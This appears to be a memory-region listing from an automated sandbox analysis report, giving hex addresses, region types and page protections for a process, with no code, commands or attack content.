E0000
|
unkown
|
page readonly
|
||
232000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page readonly
|
||
226000
|
unkown
|
page read and write
|
||
3E2000
|
heap default
|
page read and write
|
||
483000
|
heap default
|
page read and write
|
||
2DC000
|
unkown
|
page read and write
|
||
21B7000
|
unkown
|
page readonly
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
36CE000
|
unkown
|
page read and write
|
||
2130000
|
unkown
|
page readonly
|
||
374A000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
2FDA000
|
unkown
|
page read and write
|
||
6B4000
|
heap private
|
page read and write
|
||
28D5000
|
unkown
|
page read and write
|
||
219E000
|
unkown
|
page read and write
|
||
1DB0000
|
heap private
|
page read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3C6E000
|
unkown
|
page read and write
|
||
55D000
|
heap default
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
2A4000
|
heap private
|
page read and write
|
||
674000
|
heap default
|
page read and write
|
||
190000
|
unkown
|
page read and write
|
||
300000
|
unkown
|
page readonly
|
||
1DD7000
|
unkown
|
page readonly
|
||
348000
|
heap private
|
page read and write
|
||
2996000
|
unkown
|
page read and write
|
||
307E000
|
unkown
|
page read and write
|
||
25A0000
|
heap private
|
page read and write
|
||
5A7000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
1E5000
|
unkown
|
page read and write | page guard
|
||
28D0000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
1AB000
|
unkown
|
page read and write
|
||
31D000
|
heap default
|
page read and write
|
||
1D70000
|
unkown
|
page read and write
|
||
270000
|
unkown
|
page readonly
|
||
2840000
|
unkown
|
page read and write
|
||
263E000
|
unkown
|
page read and write
|
||
3F0000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
2F2000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2204000
|
heap private
|
page read and write
|
||
2260000
|
heap private
|
page read and write
|
||
318F000
|
unkown
|
page read and write
|
||
285E000
|
stack
|
page read and write
|
||
1C8DE000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page readonly
|
||
290000
|
unkown
|
page readonly
|
||
7FF00040000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
1D10000
|
unkown
|
page readonly
|
||
241E000
|
unkown
|
page read and write
|
||
660000
|
heap default
|
page read and write
|
||
4A0000
|
heap default
|
page read and write
|
||
8C0000
|
heap private
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
7FF00170000
|
unkown
|
page read and write
|
||
59E000
|
unkown
|
page read and write
|
||
25B0000
|
unkown
|
page readonly
|
||
58A000
|
heap default
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
21D0000
|
unkown
|
page read and write
|
||
2C7E000
|
unkown
|
page read and write
|
||
1B0000
|
heap private
|
page read and write
|
||
46C000
|
heap default
|
page read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
283F000
|
unkown
|
page read and write
|
||
1EB0000
|
unkown
|
page readonly
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
25EC000
|
unkown
|
page read and write
|
||
360000
|
heap private
|
page read and write
|
||
3B0000
|
heap private
|
page read and write
|
||
3026000
|
unkown
|
page read and write
|
||
295E000
|
unkown
|
page read and write
|
||
70D000
|
heap default
|
page read and write
|
||
364000
|
heap default
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
7FF00207000
|
unkown
|
page read and write
|
||
78D000
|
stack
|
page read and write
|
||
2D9E000
|
unkown
|
page read and write
|
||
2B90000
|
unkown
|
page readonly
|
||
74A000
|
heap default
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
7FF0004C000
|
unkown
|
page execute and read and write
|
||
1B5FF000
|
unkown
|
page read and write
|
||
36A5000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
1ED0000
|
unkown
|
page readonly
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
100000
|
unkown
|
page readonly
|
||
2840000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2FD0000
|
unkown
|
page read and write
|
||
2222000
|
heap private
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
1FB000
|
stack
|
page read and write
|
||
5D7000
|
heap default
|
page read and write
|
||
2DA000
|
stack
|
page read and write
|
||
26FD000
|
stack
|
page read and write
|
||
308F000
|
unkown
|
page read and write
|
||
330000
|
unkown
|
page readonly
|
||
1F0000
|
heap private
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
A0000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
36CB000
|
unkown
|
page read and write
|
||
1B0000
|
heap private
|
page read and write
|
||
27A000
|
stack
|
page read and write
|
||
2BDE000
|
unkown
|
page read and write | page guard
|
||
7C4000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page read and write
|
||
27B000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page read and write
|
||
369F000
|
unkown
|
page read and write
|
||
2FF4000
|
unkown
|
page read and write
|
||
790000
|
unkown
|
page readonly
|
||
3093000
|
unkown
|
page read and write
|
||
276E000
|
unkown
|
page read and write
|
||
307A000
|
unkown
|
page read and write
|
||
8EF000
|
stack
|
page read and write
|
||
23F000
|
unkown
|
page execute and read and write
|
||
1CA0000
|
unkown
|
page readonly
|
||
2C7D000
|
stack
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
7E2000
|
heap private
|
page read and write
|
||
30C6000
|
unkown
|
page read and write
|
||
3E0000
|
heap private
|
page read and write
|
||
6A4000
|
heap default
|
page read and write
|
||
1B970000
|
unkown
|
page read and write
|
||
4C2000
|
heap default
|
page read and write
|
||
A0000
|
unkown
|
page read and write
|
||
73F000
|
heap default
|
page read and write
|
||
FA000
|
stack
|
page read and write
|
||
454000
|
unkown
|
page read and write
|
||
2EB0000
|
heap private
|
page read and write
|
||
A0000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page readonly
|
||
48D000
|
heap default
|
page read and write
|
||
A70000
|
heap private
|
page read and write
|
||
2CB0000
|
heap private
|
page read and write
|
||
27A0000
|
unkown
|
page readonly
|
||
370000
|
unkown
|
page read and write
|
||
517000
|
heap default
|
page read and write
|
||
547000
|
heap default
|
page read and write
|
||
5B0000
|
unkown
|
page readonly
|
||
900000
|
unkown
|
page readonly
|
||
34EB000
|
unkown
|
page read and write
|
||
9F8000
|
heap private
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
410000
|
unkown
|
page read and write
|
||
A0000
|
unkown
|
page read and write
|
||
404000
|
heap default
|
page read and write
|
||
3172000
|
unkown
|
page read and write
|
||
1EF0000
|
heap private
|
page execute and read and write
|
||
6A0000
|
unkown
|
page readonly
|
||
560000
|
heap private
|
page read and write
|
||
2B70000
|
unkown
|
page readonly
|
||
277C000
|
unkown
|
page readonly
|
||
610000
|
unkown
|
page readonly
|
||
4ED000
|
heap default
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
44F000
|
unkown
|
page read and write
|
||
3CE000
|
heap default
|
page read and write
|
||
2220000
|
heap private
|
page read and write
|
||
140000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
64E000
|
unkown
|
page read and write
|
||
2CB0000
|
unkown
|
page readonly
|
||
2260000
|
heap private
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
2C3D000
|
stack
|
page read and write
|
||
3C70000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
D30000
|
unkown
|
page readonly
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
5C4000
|
heap default
|
page read and write
|
||
24B000
|
unkown
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
23E0000
|
unkown
|
page readonly
|
||
150000
|
unkown
|
page read and write
|
||
16A000
|
stack
|
page read and write
|
||
D20000
|
heap private
|
page read and write
|
||
59D000
|
unkown
|
page read and write
|
||
2E5E000
|
stack
|
page read and write
|
||
2780000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page read and write
|
||
27EE000
|
unkown
|
page read and write
|
||
277000
|
heap default
|
page read and write
|
||
311C000
|
unkown
|
page read and write
|
||
557000
|
heap default
|
page read and write
|
||
32E000
|
stack
|
page read and write
|
||
C0000
|
unkown
|
page readonly
|
||
2D9F000
|
stack
|
page read and write
|
||
3105000
|
unkown
|
page read and write
|
||
2A60000
|
unkown
|
page readonly
|
||
1C9C3000
|
heap private
|
page read and write
|
||
220000
|
heap private
|
page read and write
|
||
20F0000
|
unkown
|
page readonly
|
||
270000
|
unkown
|
page execute and read and write
|
||
3D28000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
2880000
|
unkown
|
page readonly
|
||
236E000
|
unkown
|
page read and write
|
||
1DB4000
|
heap private
|
page read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
1B580000
|
unkown
|
page read and write
|
||
6B0000
|
heap private
|
page read and write
|
||
36B8000
|
unkown
|
page read and write
|
||
310F000
|
unkown
|
page read and write
|
||
28DA000
|
unkown
|
page read and write
|
||
609000
|
heap default
|
page read and write
|
||
2380000
|
unkown
|
page readonly
|
||
625000
|
heap default
|
page read and write
|
||
534000
|
heap default
|
page read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
180000
|
heap private
|
page read and write
|
||
270000
|
unkown
|
page write copy
|
||
10000000
|
unkown
|
page execute and read and write
|
||
36BE000
|
unkown
|
page read and write
|
||
2100000
|
heap private
|
page read and write
|
||
27C0000
|
unkown
|
page readonly
|
||
7A0000
|
unkown
|
page readonly
|
||
15C000
|
unkown
|
page read and write
|
||
618000
|
heap default
|
page read and write
|
||
ABF000
|
unkown
|
page read and write
|
||
2A90000
|
unkown
|
page read and write
|
||
2FC0000
|
heap private
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
620000
|
unkown
|
page readonly
|
||
310000
|
heap private
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
2CAE000
|
unkown
|
page read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
12EB1000
|
unkown
|
page read and write
|
||
940000
|
unkown
|
page read and write
|
||
3175000
|
unkown
|
page read and write
|
||
73C000
|
heap default
|
page read and write
|
||
300000
|
unkown
|
page readonly
|
||
1BB50000
|
heap private
|
page read and write
|
||
1B583000
|
unkown
|
page read and write
|
||
5FE000
|
unkown
|
page read and write
|
||
245F000
|
unkown
|
page read and write
|
||
22F000
|
unkown
|
page execute and read and write
|
||
31E000
|
heap default
|
page read and write
|
||
2A0000
|
heap private
|
page read and write
|
||
3004000
|
unkown
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
3627000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
23FF000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
2CB7000
|
heap private
|
page read and write
|
||
3253000
|
unkown
|
page read and write
|
||
450000
|
heap default
|
page read and write
|
||
330000
|
unkown
|
page readonly
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
2840000
|
unkown
|
page read and write
|
||
7FF0003A000
|
unkown
|
page execute and read and write
|
||
7FF00032000
|
unkown
|
page execute and read and write
|
||
2350000
|
unkown
|
page read and write
|
||
1FD0000
|
unkown
|
page readonly
|
||
21E0000
|
unkown
|
page readonly
|
||
12FF0000
|
unkown
|
page read and write
|
||
51D000
|
stack
|
page read and write
|
||
24EE000
|
stack
|
page read and write
|
||
2030000
|
heap private
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
36B5000
|
unkown
|
page read and write
|
||
28C0000
|
unkown
|
page read and write
|
||
6CF000
|
heap default
|
page read and write
|
||
24B0000
|
unkown
|
page readonly
|
||
3016000
|
unkown
|
page read and write
|
||
474000
|
heap default
|
page read and write
|
||
35DC000
|
unkown
|
page read and write
|
||
5A3000
|
unkown
|
page read and write
|
||
241F000
|
stack
|
page read and write
|
||
43F000
|
stack
|
page read and write
|
||
1DF000
|
unkown
|
page execute and read and write
|
||
1FF000
|
unkown
|
page execute and read and write
|
||
37D000
|
heap default
|
page read and write
|
||
2E0000
|
heap default
|
page read and write
|
||
375F000
|
unkown
|
page read and write
|
||
2E0E000
|
unkown
|
page read and write
|
||
6D3000
|
heap default
|
page read and write
|
||
310000
|
unkown
|
page readonly
|
||
1EF7000
|
unkown
|
page readonly
|
||
5C0000
|
unkown
|
page readonly
|
||
2640000
|
unkown
|
page readonly
|
||
9A000
|
stack
|
page read and write
|
||
1C95E000
|
unkown
|
page read and write
|
||
1DF000
|
unkown
|
page execute and read and write
|
||
2E0000
|
unkown
|
page readonly
|
||
330000
|
heap private
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
2BE000
|
unkown
|
page read and write
|
||
684000
|
heap default
|
page read and write
|
||
28A0000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
27A0000
|
unkown
|
page readonly
|
||
69D000
|
heap default
|
page read and write
|
||
2D6E000
|
stack
|
page read and write
|
||
311F000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
2D2E000
|
stack
|
page read and write
|
||
634000
|
heap default
|
page read and write
|
||
290000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
2840000
|
unkown
|
page read and write
|
||
2DA1000
|
unkown
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
230E000
|
stack
|
page read and write
|
||
800000
|
heap private
|
page read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
380000
|
heap default
|
page read and write
|
||
2370000
|
unkown
|
page readonly
|
||
3165000
|
unkown
|
page read and write
|
||
2E0000
|
unkown
|
page readonly
|
||
10000000
|
unkown
|
page execute and read and write
|
||
37C2000
|
unkown
|
page read and write
|
||
22C2000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
54D000
|
heap default
|
page read and write
|
||
21E0000
|
heap private
|
page read and write
|
||
2C0E000
|
stack
|
page read and write
|
||
2160000
|
heap private
|
page read and write
|
||
2C30000
|
unkown
|
page readonly
|
||
2E2000
|
heap private
|
page read and write
|
||
2780000
|
unkown
|
page readonly
|
||
2270000
|
unkown
|
page readonly
|
||
850000
|
heap private
|
page read and write
|
||
36BB000
|
unkown
|
page read and write
|
||
430000
|
unkown
|
page readonly
|
||
286D000
|
unkown
|
page read and write
|
||
335D000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2840000
|
unkown
|
page read and write
|
||
9E0000
|
heap private
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
2E04000
|
unkown
|
page read and write
|
||
1B8000
|
heap private
|
page read and write
|
||
331F000
|
unkown
|
page read and write
|
||
540000
|
heap private
|
page read and write
|
||
32BD000
|
unkown
|
page read and write
|
||
255E000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1BF0000
|
unkown
|
page readonly
|
||
2D20000
|
heap private
|
page execute and read and write
|
||
460000
|
heap default
|
page read and write
|
||
30D8000
|
unkown
|
page read and write
|
||
29F000
|
unkown
|
page execute and read and write
|
||
6FC000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
7FF00105000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
1CAF0000
|
heap private
|
page read and write
|
||
1C9B0000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1BAD0000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
36A2000
|
unkown
|
page read and write
|
||
309C000
|
unkown
|
page read and write
|
||
12F11000
|
unkown
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
2DD6000
|
unkown
|
page read and write
|
||
13052000
|
unkown
|
page read and write
|
||
360000
|
heap default
|
page read and write
|
||
270000
|
heap private
|
page read and write
|
||
30D3000
|
unkown
|
page read and write
|
||
24D0000
|
unkown
|
page readonly
|
||
60000
|
unkown
|
page readonly
|
||
2D4E000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
36E1000
|
unkown
|
page read and write
|
||
3020000
|
unkown
|
page read and write
|
||
21B000
|
unkown
|
page read and write
|
||
88E000
|
unkown
|
page read and write
|
||
2C1E000
|
stack
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
30F4000
|
unkown
|
page read and write
|
||
43E000
|
stack
|
page read and write
|
||
314D000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
820000
|
unkown
|
page readonly
|
||
3B3000
|
heap default
|
page read and write
|
||
3023000
|
unkown
|
page read and write
|
||
4C4000
|
heap private
|
page read and write
|
||
350000
|
heap private
|
page read and write
|
||
28CA000
|
unkown
|
page read and write
|
||
2C2000
|
heap private
|
page read and write
|
||
32F9000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
343000
|
heap default
|
page read and write
|
||
1EE0000
|
unkown
|
page readonly
|
||
A8E000
|
stack
|
page read and write
|
||
579000
|
heap default
|
page read and write
|
||
3C3000
|
heap default
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
7FF000F0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
221F000
|
stack
|
page read and write
|
||
2770000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page readonly
|
||
2960000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
527000
|
heap default
|
page read and write
|
||
A0000
|
unkown
|
page readonly
|
||
D27000
|
heap private
|
page read and write
|
||
3FD000
|
stack
|
page read and write
|
||
26A000
|
stack
|
page read and write
|
||
AF0000
|
heap private
|
page read and write
|
||
FB000
|
unkown
|
page read and write
|
||
4E0000
|
unkown
|
page readonly
|
||
30E3000
|
unkown
|
page read and write
|
||
2530000
|
unkown
|
page readonly
|
||
2840000
|
unkown
|
page readonly
|
||
4C0000
|
heap private
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
1BC000
|
unkown
|
page read and write
|
||
30C0000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
650000
|
unkown
|
page readonly
|
||
1B470000
|
unkown
|
page read and write
|
||
30FA000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
1AE00000
|
unkown
|
page read and write
|
||
5D0000
|
heap default
|
page read and write
|
||
3BD000
|
unkown
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
B0E000
|
unkown
|
page read and write
|
||
2D0000
|
heap private
|
page read and write
|
||
707000
|
heap default
|
page read and write
|
||
30A7000
|
unkown
|
page read and write
|
||
2A2D000
|
unkown
|
page read and write
|
||
2E0000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2510000
|
unkown
|
page readonly
|
||
32F6000
|
unkown
|
page read and write
|
||
3B0000
|
heap default
|
page read and write
|
||
34E000
|
unkown
|
page read and write
|
||
7FF00042000
|
unkown
|
page execute and read and write
|
||
2840000
|
unkown
|
page read and write
|
||
7FE000
|
stack
|
page read and write
|
||
2D4000
|
heap private
|
page read and write
|
||
23F000
|
unkown
|
page execute and read and write
|
||
26BE000
|
unkown
|
page read and write
|
||
2FF1000
|
unkown
|
page read and write
|
||
2C5C000
|
unkown
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
84F000
|
stack
|
page read and write
|
||
340000
|
unkown
|
page readonly
|
||
470000
|
unkown
|
page readonly
|
||
790000
|
unkown
|
page readonly
|
||
3689000
|
unkown
|
page read and write
|
||
58E000
|
heap default
|
page read and write
|
||
CF2000
|
heap private
|
page read and write
|
||
2D0000
|
heap private
|
page read and write
|
||
2CB4000
|
heap private
|
page read and write
|
||
1EF000
|
unkown
|
page execute and read and write
|
||
206B000
|
heap private
|
page read and write
|
||
2DBE000
|
stack
|
page read and write
|
||
2C40000
|
unkown
|
page write copy
|
||
7FF000F2000
|
unkown
|
page execute and read and write
|
||
7FF00132000
|
unkown
|
page execute and read and write
|
||
2B0000
|
unkown
|
page readonly
|
||
610000
|
heap default
|
page read and write
|
||
3D22000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
260000
|
unkown
|
page readonly
|
||
1B5F0000
|
unkown
|
page read and write
|
||
457000
|
heap default
|
page read and write
|
||
660000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
2320000
|
unkown
|
page write copy
|
||
279D000
|
unkown
|
page read and write
|
||
2CAC000
|
unkown
|
page read and write
|
||
2AE000
|
heap default
|
page read and write
|
||
1A0000
|
heap default
|
page read and write
|
||
1D0000
|
heap private
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
279B000
|
unkown
|
page readonly
|
||
3122000
|
unkown
|
page read and write
|
||
900000
|
heap private
|
page read and write
|
||
36E4000
|
unkown
|
page read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
30A0000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
390000
|
heap default
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
1DC0000
|
unkown
|
page readonly
|
||
130000
|
unkown
|
page readonly
|
||
7A0000
|
unkown
|
page readonly
|
||
30DF000
|
unkown
|
page read and write
|
||
2C3C000
|
unkown
|
page read and write
|
||
230000
|
heap private
|
page read and write
|
||
3101000
|
unkown
|
page read and write
|
||
3B41000
|
unkown
|
page read and write
|
||
3075000
|
unkown
|
page read and write
|
||
2D70000
|
unkown
|
page write copy
|
||
B9E000
|
unkown
|
page read and write
|
||
1E57000
|
unkown
|
page readonly
|
||
597000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
59E000
|
heap default
|
page read and write
|
||
890000
|
unkown
|
page readonly
|
||
647000
|
heap default
|
page read and write
|
||
2C4000
|
heap private
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
2BE0000
|
unkown
|
page write copy
|
||
2400000
|
unkown
|
page readonly
|
||
2FFA000
|
unkown
|
page read and write
|
||
7FF00230000
|
unkown
|
page read and write
|
||
550000
|
unkown
|
page readonly
|
||
3C4A000
|
unkown
|
page read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
2BDF000
|
unkown
|
page read and write
|
||
12DA1000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
2202000
|
heap private
|
page read and write
|
||
347000
|
heap default
|
page read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
3A6000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
2460000
|
unkown
|
page readonly
|
||
7FF00265000
|
unkown
|
page execute and read and write
|
||
12DA5000
|
unkown
|
page read and write
|
||
3C0000
|
heap default
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
2200000
|
heap private
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
6D0000
|
heap default
|
page read and write
|
||
36EA000
|
unkown
|
page read and write
|
||
C4E000
|
unkown
|
page read and write
|
||
273E000
|
stack
|
page read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
560000
|
unkown
|
page readonly
|
||
5A3000
|
heap default
|
page read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
277E000
|
stack
|
page read and write
|
||
2D8E000
|
unkown
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
544000
|
heap default
|
page read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
1CF0000
|
unkown
|
page readonly
|
||
24AF000
|
stack
|
page read and write
|
||
7C0000
|
heap private
|
page read and write
|
||
350000
|
unkown
|
page readonly
|
||
1E6000
|
unkown
|
page read and write
|
||
3010000
|
unkown
|
page read and write
|
||
2D4000
|
heap private
|
page read and write
|
||
28C4000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
20B0000
|
unkown
|
page readonly
|
||
20AE000
|
stack
|
page read and write
|
||
5A0000
|
heap default
|
page read and write
|
||
357000
|
heap default
|
page read and write
|
||
2D6E000
|
unkown
|
page read and write
|
||
697000
|
heap default
|
page read and write
|
||
15B000
|
unkown
|
page read and write
|
||
487000
|
heap default
|
page read and write
|
||
210000
|
unkown
|
page readonly
|
||
2320000
|
unkown
|
page read and write
|
||
2C2D000
|
stack
|
page read and write
|
||
20D0000
|
unkown
|
page read and write
|
||
280000
|
unkown
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
710000
|
unkown
|
page readonly
|
||
3039000
|
unkown
|
page read and write
|
||
594000
|
unkown
|
page read and write
|
||
377000
|
heap default
|
page read and write
|
||
290000
|
heap private
|
page read and write
|
||
1D60000
|
unkown
|
page readonly
|
||
1ED7000
|
unkown
|
page readonly
|
||
230C000
|
unkown
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
2317000
|
unkown
|
page readonly
|
||
96E000
|
unkown
|
page read and write
|
||
21E4000
|
heap private
|
page read and write
|
||
6D7000
|
heap default
|
page read and write
|
||
340000
|
unkown
|
page readonly
|
||
2270000
|
unkown
|
page readonly
|
||
5DD000
|
heap default
|
page read and write
|
||
3C5C000
|
unkown
|
page read and write
|
||
1C7DE000
|
unkown
|
page read and write
|
||
667000
|
heap default
|
page read and write
|
||
2B70000
|
unkown
|
page write copy
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
BC0000
|
heap private
|
page read and write
|
||
238000
|
heap private
|
page read and write
|
||
270C000
|
unkown
|
page read and write
|
||
B70000
|
heap private
|
page read and write
|
||
1001F000
|
unkown
|
page execute and read and write
|
||
26B000
|
unkown
|
page read and write
|
||
310000
|
unkown
|
page readonly
|
||
3248000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
2C4E000
|
unkown
|
page read and write
|
||
760000
|
unkown
|
page readonly
|
||
642000
|
heap default
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page read and write
|
||
7FF002A0000
|
unkown
|
page execute and read and write
|
||
5A6000
|
unkown
|
page read and write
|
||
A90000
|
unkown
|
page write copy
|
||
510000
|
heap default
|
page read and write
|
||
322D000
|
unkown
|
page read and write
|
||
196000
|
unkown
|
page read and write
|
||
69D000
|
heap default
|
page read and write
|
||
218E000
|
stack
|
page read and write
|
||
1FA7000
|
unkown
|
page readonly
|
||
2D0000
|
unkown
|
page readonly
|
||
AA000
|
stack
|
page read and write
|
||
7FF0010A000
|
unkown
|
page execute and read and write
|
||
D0000
|
unkown
|
page execute and read and write
|
||
2710000
|
unkown
|
page readonly
|
||
7AF000
|
stack
|
page read and write
|
||
2240000
|
unkown
|
page readonly
|
||
260000
|
unkown
|
page readonly
|
||
7FF00210000
|
unkown
|
page read and write
|
||
3E8000
|
heap private
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
450000
|
unkown
|
page readonly
|
||
300000
|
unkown
|
page readonly
|
||
317000
|
heap default
|
page read and write
|
||
304000
|
heap default
|
page read and write
|
||
30ED000
|
unkown
|
page read and write
|
||
7FF002B0000
|
unkown
|
page execute and read and write
|
||
570000
|
unkown
|
page readonly
|
||
1D80000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page readonly
|
||
440000
|
heap private
|
page read and write
|
||
683000
|
heap default
|
page read and write
|
||
2FD0000
|
unkown
|
page readonly
|
||
2B0000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
1C0000
|
unkown
|
page readonly
|
||
688000
|
heap default
|
page read and write
|
||
4BE000
|
heap default
|
page read and write
|
||
6CF000
|
stack
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
2F2000
|
heap private
|
page read and write
|
||
298000
|
heap private
|
page read and write
|
||
2CCE000
|
stack
|
page read and write
|
||
3146000
|
unkown
|
page read and write
|
||
1F47000
|
unkown
|
page readonly
|
||
22A4000
|
heap private
|
page read and write
|
||
742000
|
heap default
|
page read and write
|
||
2C8D000
|
stack
|
page read and write
|
||
290000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2D7E000
|
unkown
|
page read and write
|
||
35B3000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page execute and read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
3E0000
|
unkown
|
page readonly
|
||
36A8000
|
unkown
|
page read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
140000
|
unkown
|
page readonly
|
||
274C000
|
unkown
|
page read and write
|
||
2C40000
|
heap private
|
page read and write
|
||
640000
|
unkown
|
page readonly
|
||
CD4000
|
heap private
|
page read and write
|
||
2BBD000
|
stack
|
page read and write
|
||
2840000
|
unkown
|
page read and write
|
||
2DD2000
|
unkown
|
page read and write
|
||
4D0000
|
unkown
|
page readonly
|
||
